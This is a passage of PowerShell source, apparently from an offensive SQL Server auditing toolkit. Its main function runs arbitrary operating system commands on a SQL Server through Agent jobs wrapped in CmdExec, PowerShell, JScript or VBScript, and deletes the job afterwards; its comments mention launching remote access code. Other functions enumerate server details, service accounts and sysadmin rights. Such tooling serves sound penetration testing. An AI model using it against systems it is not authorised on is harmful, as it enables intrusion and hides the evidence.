-SuppressVerbose } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } # Add record $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblResults } } # ---------------------------------- # Invoke-SQLOSCmd # ---------------------------------- # Author: Leo Loobeek # Updates By: Scott Sutherland # TODO: # - Find better option for SQL Agent Service check # - Find better option for SQL Agent Service start # - Add raw script option for jscript/vbscript Function Invoke-SQLOSCmdAgentJob { <# .SYNOPSIS Run operating system commands on a Microsoft SQL server by leveraging the SQL Agent Job service. There is not a method to retrieve the output, but it's useful for launching remote access code or sending output through another means. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER TimeOut Connection time out. .PARAMETER Sleep Command execution time in seconds. .PARAMETER SuppressVerbose Suppress verbose errors. Used when function is wrapped. .PARAMETER Type The type of Job subsystem to launch. Choices are CmdExec (windows command) or PowerShell. .PARAMETER Command Based on type chosen above, this is the command launched when the job is executed. If nesting PowerShell variables within the command, it will need to be escaped with ` (back tick). .LINK https://technet.microsoft.com/en-us/library/ms187100(v=sql.105).aspx PowerShell/CMDEXEC SubSystem code taken from Nick Popovich (@pipefish_) from Optiv. https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution ActiveX VBScript/Jscript SubSystem code based on scripts on Microsoft documentation. .EXAMPLE Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem CmdExec -Command "echo hello > c:\windows\temp\test1.txt" Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem PowerShell -Command 'write-output "hello world" | out-file c:\windows\temp\test2.txt' -Sleep 20 Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem VBScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test3.txt' Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem JScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test4.txt' .EXAMPLE Invoke-SQLOSCmdAgentJob -Verbose -Instance MSSQLSRV04\SQLSERVER2014 -Username sa -Password 'EvilLama!' -SubSystem JScript -Command 'c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test5.txt' VERBOSE: MSSQLSRV04\SQLSERVER2014 : Connection Success. VERBOSE: MSSQLSRV04\SQLSERVER2014 : SubSystem: JScript VERBOSE: MSSQLSRV04\SQLSERVER2014 : Command: c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\test.txt VERBOSE: MSSQLSRV04\SQLSERVER2014 : You have EXECUTE privileges to create Agent Jobs (sp_add_job). VERBOSE: MSSQLSRV04\SQLSERVER2014 : Running the command VERBOSE: MSSQLSRV04\SQLSERVER2014 : Starting sleep for 5 seconds VERBOSE: MSSQLSRV04\SQLSERVER2014 : Removing job from server VERBOSE: MSSQLSRV04\SQLSERVER2014 : Command complete ComputerName Instance Results ------------ -------- ------- MSSQLSRV04 MSSQLSRV04\SQLSERVER2014 The Job succesfully started and was removed. #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Connect using Dedicated Admin Connection.')] [Switch]$DAC, [Parameter(Mandatory = $true, HelpMessage = 'Support subsystems include CmdExec, PowerShell, JScript, and VBScript.')] [ValidateSet("CmdExec", "PowerShell","JScript","VBScript")] [string] $SubSystem, [Parameter(Mandatory = $true, HelpMessage = 'OS command to be executed.')] [String]$Command, [Parameter(Mandatory = $false, HelpMessage = 'Connection timeout.')] [string]$TimeOut, [Parameter(Mandatory = $false, HelpMessage = 'Command run time before killing the agent job.')] [int]$Sleep = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for output $TblCommands = New-Object -TypeName System.Data.DataTable $TblResults = New-Object -TypeName System.Data.DataTable $null = $TblResults.Columns.Add('ComputerName') $null = $TblResults.Columns.Add('Instance') $null = $TblResults.Columns.Add('Results') } Process { # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Setup DAC string if($DAC) { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -DAC -TimeOut $TimeOut } else { # Create connection object $Connection = Get-SQLConnectionObject -Instance $Instance -Username $Username -Password $Password -Credential $Credential -TimeOut $TimeOut } # Attempt connection try { # Open connection $Connection.Open() if(-not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." # Status configuration Write-Verbose -Message "$Instance : SubSystem: $SubSystem" Write-Verbose -Message "$Instance : Command: $Command" } # Get some information about current context $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $CurrentLogin = $ServerInfo.CurrentLogin $ComputerName = $ServerInfo.ComputerName $SysadminStatus = $ServerInfo.IsSysAdmin <# table not accessible to non sysadmin logins that may have other privileges # Check if Agent Job service is running $IsAgentServiceEnabled = Get-SQLQuery -Instance $Instance -Query "SELECT 1 FROM sysprocesses WHERE LEFT(program_name, 8) = 'SQLAgent'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # See if the SQL Server Agent Service is enabled if ($IsAgentServiceEnabled) { Write-Verbose -Message "$Instance : Verfied the SQL Server Agent service is running." } else { # TODO: Find reliable way to start agent service if possible Write-Verbose -Message "$Instance : SQL Server Agent service has not been started. Aborting..." $null = $TblResults.Rows.Add("$ComputerName","$Instance",'SQL Server Agent service not started.') return } #> # https://msdn.microsoft.com/en-us/library/ms188283.aspx # Check to see if member of any SQL Agent roles listed above # If a user is a sysadmin, or a member of any of the 3 database roles they should be able to # create and execute their own agent jobs on the SQL server. # Check for sysadmin role if($SysadminStatus -eq "Yes"){ $ConfirmedPrivs = $CurrentLogin } # Check for agent database roles $AddJobPrivs = Get-SQLDatabaseRoleMember -Username $Username -Password $Password -Instance $Instance -DatabaseName msdb -SuppressVerbose | ForEach-Object { if(($_.RolePrincipalName -match "SQLAgentUserRole|SQLAgentReaderRole|SQLAgentOperatorRole")) { if ($_.PrincipalName -eq $CurrentLogin) { $ConfirmedPrivs = $CurrentLogin } } } # Attempt to create the agent jobs if($ConfirmedPrivs) { Write-Verbose -Message "$Instance : You have EXECUTE privileges to create Agent Jobs (sp_add_job)." # Setup place holder for $DatabaseSub $DatabaseSub = "" $SubSystemFinal = $SubSystem # Setup JScript wrapper If($SubSystem -eq "JScript"){ # Double the slashes to support the command syntax $Command = $Command.Replace("\","\\") # Create the JScript # Example command: c:\\windows\\system32\\cmd.exe /c echo hello > c:\\windows\\temp\\blah.txt $JScript_Command = @" function RunCmd() { var WshShell = new ActiveXObject("WScript.Shell"); var oExec = WshShell.Exec("$Command"); oExec = null; WshShell = null; } RunCmd(); "@ # Overwrite command with the JScript $Command = $JScript_Command $SubSystemFinal = "ActiveScripting" $DatabaseSub = "@database_name=N'JavaScript'," } # Setup VBScript wrapper If($SubSystem -eq "VBScript"){ # Create the VBScript # Example Command: c:\windows\system32\cmd.exe /c echo hello > c:\windows\temp\blah.txt $VBScript_Command = @" Function Main() dim shell set shell= CreateObject ("WScript.Shell") shell.run("$Command") set shell = nothing END Function "@ # Overwrite command with the VBScript $Command = $VBScript_Command $SubSystemFinal = "ActiveScripting" $DatabaseSub = "@database_name=N'VBScript'," } # Fix single quotes so then can be used within commands ' -> '' $Command = $Command -replace "'","''" # Got the privs, let's execute some malicious code! # SQL Query taken from https://www.optiv.com/blog/mssql-agent-jobs-for-command-execution # Authors: # Nicholas Popovich for PowerShelland CmdExec # Scott Sutherland for VBScript and JScript $JobQuery = "USE msdb; EXECUTE dbo.sp_add_job @job_name = N'powerupsql_job' EXECUTE sp_add_jobstep @job_name = N'powerupsql_job', @step_name = N'powerupsql_job_step', @subsystem = N'$SubSystemFinal', @command = N'$Command', $DatabaseSub @flags=0, @retry_attempts = 1, @retry_interval = 5 EXECUTE dbo.sp_add_jobserver @job_name = N'powerupsql_job' EXECUTE dbo.sp_start_job N'powerupsql_job'" $CleanUpQuery = "USE msdb; EXECUTE sp_delete_job @job_name = N'powerupsql_job';" Write-Verbose -Message "$Instance : Running the command" # Execute Query Get-SQLQuery -Instance $Instance -Query $JobQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $result = Get-SQLQuery -Instance $Instance -Query "use msdb; EXECUTE sp_help_job @job_name = N'powerupsql_job'" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if(!($result)) { Write-Warning "Job failed to start. Recheck your command and try again." $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Agent Job failed to start.') return } # Sleep for 5 seconds to ensure job starts, may need to increase or remove this after further testing Write-Verbose "$Instance : Starting sleep for $Sleep seconds" Start-Sleep $Sleep # Clean up the Job Write-Verbose "$Instance : Removing job from server" Get-SQLQuery -Instance $Instance -Query $CleanUpQuery -Username $Username -Password $Password -Credential $Credential -SuppressVerbose $null = $TblResults.Rows.Add("$ComputerName","$Instance",'The Job succesfully started and was removed.') } else { Write-Verbose -Message "$Instance : You do not have privileges to add agent jobs (sp_add_job). Aborting..." $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Insufficient privilieges to add Agent Jobs.') return } # Close connection $Connection.Close() # Dispose connection $Connection.Dispose() # Status Write-Verbose -Message "$Instance : Command complete" } catch { # Connection failed if(-not $SuppressVerbose) { $ErrorMessage = $_.Exception.Message Write-Verbose -Message "$Instance : Connection Failed." #Write-Verbose " Error: $ErrorMessage" } $null = $TblResults.Rows.Add("$ComputerName","$Instance",'Not Accessible') } return $TblResults } } # ---------------------------------- # Get-SQLServerInfo # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerInfo { <# .SYNOPSIS Returns basic server and user information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Get-SQLServerInfo -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DomainName : Domain ServiceProcessId : 6758 ServiceName : MSSQL$STANDARDDEV2014 ServiceAccount : LocalSystem AuthenticationMode : Windows and SQL Server Authentication Clustered : No SQLServerVersionNumber : 12.0.4213.0 SQLServerMajorVersion : 2014 SQLServerEdition : Developer Edition (64-bit) SQLServerServicePack : SP1 OSArchitecture : X64 OsMachineType : WinNT OSVersionName : Windows 8.1 Pro OsVersionNumber : 6.3 Currentlogin : Domain\MyUser IsSysadmin : Yes ActiveSessions : 1 .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerInfo -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Table for output $TblServerInfo = New-Object -TypeName System.Data.DataTable } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get number of active sessions for server $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Where-Object -FilterScript { $_.SessionStatus -eq 'running' } | Measure-Object -Line | Select-Object -Property Lines -ExpandProperty Lines # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq 'Yes') { # Grab additional information if sysadmin $SysadminSetup = " -- Get machine type DECLARE @MachineType SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', @value_name = N'ProductType', @value = @MachineType output -- Get OS version DECLARE @ProductName SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion', @value_name = N'ProductName', @value = @ProductName output" $SysadminQuery = ' @MachineType as [OsMachineType], @ProductName as [OSVersionName],' } else { $SysadminSetup = '' $SysadminQuery = '' } # Define Query $Query = " -- Get SQL Server Information -- Get SQL Server Service Name and Path DECLARE @SQLServerInstance varchar(250) DECLARE @SQLServerServiceName varchar(250) if @@SERVICENAME = 'MSSQLSERVER' BEGIN set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' set @SQLServerServiceName = 'MSSQLSERVER' END ELSE BEGIN set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250)) END -- Get SQL Server Service Account DECLARE @ServiceaccountName varchar(250) EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @SQLServerInstance, N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' -- Get authentication mode DECLARE @AuthenticationMode INT EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', N'Software\Microsoft\MSSQLServer\MSSQLServer', N'LoginMode', @AuthenticationMode OUTPUT -- Get the forced encryption flag BEGIN TRY DECLARE @ForcedEncryption INT EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', N'SOFTWARE\MICROSOFT\Microsoft SQL Server\MSSQLServer\SuperSocketNetLib', N'ForceEncryption', @ForcedEncryption OUTPUT END TRY BEGIN CATCH END CATCH -- Grab additional information as sysadmin $SysadminSetup -- Return server and version information SELECT '$ComputerName' as [ComputerName], @@servername as [Instance], DEFAULT_DOMAIN() as [DomainName], SERVERPROPERTY('processid') as ServiceProcessID, @SQLServerServiceName as [ServiceName], @ServiceAccountName as [ServiceAccount], (SELECT CASE @AuthenticationMode WHEN 1 THEN 'Windows Authentication' WHEN 2 THEN 'Windows and SQL Server Authentication' ELSE 'Unknown' END) as [AuthenticationMode], @ForcedEncryption as ForcedEncryption, CASE SERVERPROPERTY('IsClustered') WHEN 0 THEN 'No' ELSE 'Yes' END as [Clustered], SERVERPROPERTY('productversion') as [SQLServerVersionNumber], SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion], serverproperty('Edition') as [SQLServerEdition], SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack], SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture], $SysadminQuery RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber], SYSTEM_USER as [Currentlogin], '$IsSysadmin' as [IsSysadmin], '$ActiveSessions' as [ActiveSessions]" # Execute Query $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append as needed $TblServerInfo = $TblServerInfo + $TblServerInfoTemp } End { # Return data $TblServerInfo } } # ---------------------------------- # Get-SQLServerInfoThreaded # ---------------------------------- # Author: Scott Sutherland Function Get-SQLServerInfoThreaded { <# .SYNOPSIS Returns basic server and user information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER Instance Number of host threads. .EXAMPLE PS C:\> Get-SQLServerInfoThreaded -Instance SQLServer1\STANDARDDEV2014 ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DomainName : Domain ServiceName : MSSQL$STANDARDDEV2014 ServiceAccount : LocalSystem AuthenticationMode : Windows and SQL Server Authentication Clustered : No SQLServerVersionNumber : 12.0.4213.0 SQLServerMajorVersion : 2014 SQLServerEdition : Developer Edition (64-bit) SQLServerServicePack : SP1 OSArchitecture : X64 OsMachineType : WinNT OSVersionName : Windows 8.1 Pro OsVersionNumber : 6.3 Currentlogin : Domain\MyUser IsSysadmin : Yes ActiveSessions : 1 .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLServerInfoThreaded -Verbose -Threads 20 #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Number of threads.')] [int]$Threads = 5, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Setup data table for output $TblServerInfo = New-Object -TypeName System.Data.DataTable $null = $TblServerInfo.Columns.Add('ComputerName') $null = $TblServerInfo.Columns.Add('Instance') $null = $TblServerInfo.Columns.Add('DomainName') $null = $TblServerInfo.Columns.Add('ServiceName') $null = $TblServerInfo.Columns.Add('ServiceAccount') $null = $TblServerInfo.Columns.Add('AuthenticationMode') $null = $TblServerInfo.Columns.Add('Clustered') $null = $TblServerInfo.Columns.Add('SQLServerVersionNumber') $null = $TblServerInfo.Columns.Add('SQLServerMajorVersion') $null = $TblServerInfo.Columns.Add('SQLServerEdition') $null = $TblServerInfo.Columns.Add('SQLServerServicePack') $null = $TblServerInfo.Columns.Add('OSArchitecture') $null = $TblServerInfo.Columns.Add('OsMachineType') $null = $TblServerInfo.Columns.Add('OSVersionName') $null = $TblServerInfo.Columns.Add('OsVersionNumber') $null = $TblServerInfo.Columns.Add('Currentlogin') $null = $TblServerInfo.Columns.Add('IsSysadmin') $null = $TblServerInfo.Columns.Add('ActiveSessions') # Setup data table for pipeline threading $PipelineItems = New-Object -TypeName System.Data.DataTable # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Ensure provided instance is processed if($Instance) { $ProvideInstance = New-Object -TypeName PSObject -Property @{ Instance = $Instance } } # Add instance to instance list $PipelineItems = $PipelineItems + $ProvideInstance } Process { # Create list of pipeline items $PipelineItems = $PipelineItems + $_ } End { # Define code to be multi-threaded $MyScriptBlock = { $Instance = $_.Instance # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Get number of active sessions for server $ActiveSessions = Get-SQLSession -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Where-Object -FilterScript { $_.SessionStatus -eq 'running' } | Measure-Object -Line | Select-Object -Property Lines -ExpandProperty Lines # Get sysadmin status $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq 'Yes') { # Grab additional information if sysadmin $SysadminSetup = " -- Get machine type DECLARE @MachineType SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SYSTEM\CurrentControlSet\Control\ProductOptions', @value_name = N'ProductType', @value = @MachineType output -- Get OS version DECLARE @ProductName SYSNAME EXECUTE master.dbo.xp_regread @rootkey = N'HKEY_LOCAL_MACHINE', @key = N'SOFTWARE\Microsoft\Windows NT\CurrentVersion', @value_name = N'ProductName', @value = @ProductName output" $SysadminQuery = ' @MachineType as [OsMachineType], @ProductName as [OSVersionName],' } else { $SysadminSetup = '' $SysadminQuery = '' } # Define Query $Query = " -- Get SQL Server Information -- Get SQL Server Service Name and Path DECLARE @SQLServerInstance varchar(250) DECLARE @SQLServerServiceName varchar(250) if @@SERVICENAME = 'MSSQLSERVER' BEGIN set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQLSERVER' set @SQLServerServiceName = 'MSSQLSERVER' END ELSE BEGIN set @SQLServerInstance = 'SYSTEM\CurrentControlSet\Services\MSSQL$'+cast(@@SERVICENAME as varchar(250)) set @SQLServerServiceName = 'MSSQL$'+cast(@@SERVICENAME as varchar(250)) END -- Get SQL Server Service Account DECLARE @ServiceaccountName varchar(250) EXECUTE master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', @SQLServerInstance, N'ObjectName',@ServiceAccountName OUTPUT, N'no_output' -- Get authentication mode DECLARE @AuthenticationMode INT EXEC master.dbo.xp_instance_regread N'HKEY_LOCAL_MACHINE', N'Software\Microsoft\MSSQLServer\MSSQLServer', N'LoginMode', @AuthenticationMode OUTPUT -- Grab additional information as sysadmin $SysadminSetup -- Return server and version information SELECT '$ComputerName' as [ComputerName], @@servername as [Instance], DEFAULT_DOMAIN() as [DomainName], @SQLServerServiceName as [ServiceName], @ServiceAccountName as [ServiceAccount], (SELECT CASE @AuthenticationMode WHEN 1 THEN 'Windows Authentication' WHEN 2 THEN 'Windows and SQL Server Authentication' ELSE 'Unknown' END) as [AuthenticationMode], CASE SERVERPROPERTY('IsClustered') WHEN 0 THEN 'No' ELSE 'Yes' END as [Clustered], SERVERPROPERTY('productversion') as [SQLServerVersionNumber], SUBSTRING(@@VERSION, CHARINDEX('2', @@VERSION), 4) as [SQLServerMajorVersion], serverproperty('Edition') as [SQLServerEdition], SERVERPROPERTY('ProductLevel') AS [SQLServerServicePack], SUBSTRING(@@VERSION, CHARINDEX('x', @@VERSION), 3) as [OSArchitecture], $SysadminQuery RIGHT(SUBSTRING(@@VERSION, CHARINDEX('Windows NT', @@VERSION), 14), 3) as [OsVersionNumber], SYSTEM_USER as [Currentlogin], '$IsSysadmin' as [IsSysadmin], '$ActiveSessions' as [ActiveSessions]" # Execute Query $TblServerInfoTemp = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose # Append as needed $TblServerInfoTemp | ForEach-Object -Process { # Add row $null = $TblServerInfo.Rows.Add( $_.ComputerName, $_.Instance, $_.DomainName, $_.ServiceName, $_.ServiceAccount, $_.AuthenticationMode, $_.Clustered, $_.SQLServerVersionNumber, $_.SQLServerMajorVersion, $_.SQLServerEdition, $_.SQLServerServicePack, $_.OSArchitecture, $_.OsMachineType, $_.OSVersionName, $_.OsVersionNumber, $_.Currentlogin, $_.IsSysadmin, $_.ActiveSessions ) } } # Run scriptblock using multi-threading $PipelineItems | Invoke-Parallel -ScriptBlock $MyScriptBlock -ImportSessionFunctions -ImportVariables -Throttle $Threads -RunspaceTimeout 2 -Quiet -ErrorAction SilentlyContinue return $TblServerInfo } } # ---------------------------------- # Get-SQLDatabase # ---------------------------------- # Author: Scott Sutherland Function Get-SQLDatabase { <# .SYNOPSIS Returns database information from target SQL Servers. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER DAC Connect using Dedicated Admin Connection. .PARAMETER DatabaseName Database name to filter for. .PARAMETER NoDefaults Only select non default databases. .PARAMETER HasAccess Only select databases the current user has access to. .PARAMETER SysAdminOnly Only select databases owned by a sysadmin. .EXAMPLE PS C:\> Get-SQLDatabase -Instance SQLServer1\STANDARDDEV2014 -NoDefaults -DatabaseName testdb ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 DatabaseId : 7 DatabaseName : testdb DatabaseOwner : sa OwnerIsSysadmin : 1 is_trustworthy_on : True is_db_chaining_on : False is_broker_enabled : True is_encrypted : False is_read_only : False create_date : 4/13/2016 4:27:36 PM recovery_model_desc : FULL FileName : C:\Program Files\Microsoft SQL Server\MSSQL12.STANDARDDEV2014\MSSQL\DATA\testdb.mdf DbSizeMb : 3.19 has_dbaccess : 1 .EXAMPLE PS C:\> Get-SQLInstanceLocal | Get-SQLDatabase -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, HelpMessage = 'Database name.')] [string]$DatabaseName, [Parameter(Mandatory = $false, HelpMessage = 'Only select non default databases.')] [switch]$NoDefaults, [Parameter(Mandatory = $false, HelpMessage = 'Only select databases the current user has access to.')] [switch]$HasAccess, [Parameter(Mandatory = $false, HelpMessage = 'Only select databases owned by a sysadmin.')] [switch]$SysAdminOnly, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] [switch]$SuppressVerbose ) Begin { # Create data tables for output $TblResults = New-Object -TypeName System.Data.DataTable $TblDatabases = New-Object -TypeName System.Data.DataTable $null = $TblDatabases.Columns.Add('ComputerName') $null = $TblDatabases.Columns.Add('Instance') $null = $TblDatabases.Columns.Add('DatabaseId') $null = $TblDatabases.Columns.Add('DatabaseName') $null = $TblDatabases.Columns.Add('DatabaseOwner') $null = $TblDatabases.Columns.Add('OwnerIsSysadmin') $null = $TblDatabases.Columns.Add('is_trustworthy_on') $null = $TblDatabases.Columns.Add('is_db_chaining_on') $null = $TblDatabases.Columns.Add('is_broker_enabled') $null = $TblDatabases.Columns.Add('is_encrypted') $null = $TblDatabases.Columns.Add('is_read_only') $null = $TblDatabases.Columns.Add('create_date') $null = $TblDatabases.Columns.Add('recovery_model_desc') $null = $TblDatabases.Columns.Add('FileName') $null = $TblDatabases.Columns.Add('DbSizeMb') $null = $TblDatabases.Columns.Add('has_dbaccess') # Setup database filter if($DatabaseName) { $DatabaseFilter = " and a.name like '$DatabaseName'" } else { $DatabaseFilter = '' } # Setup NoDefault filter if($NoDefaults) { $NoDefaultsFilter = " and a.name not in ('master','tempdb','msdb','model')" } else { $NoDefaultsFilter = '' } # Setup HasAccess filter if($HasAccess) { $HasAccessFilter = ' and HAS_DBACCESS(a.name)=1' } else { $HasAccessFilter = '' } # Setup owner is sysadmin filter if($SysAdminOnly) { $SysAdminOnlyFilter = " and IS_SRVROLEMEMBER('sysadmin',SUSER_SNAME(a.owner_sid))=1" } else { $SysAdminOnlyFilter = '' } } Process { # Parse computer name from the instance $ComputerName = Get-ComputerNameFromInstance -Instance $Instance # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Test connection to instance $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if($TestConnection) { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Success." } } else { if( -not $SuppressVerbose) { Write-Verbose -Message "$Instance : Connection Failed." } return } # Check version $SQLVersionFull = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Select-Object -Property SQLServerVersionNumber -ExpandProperty SQLServerVersionNumber 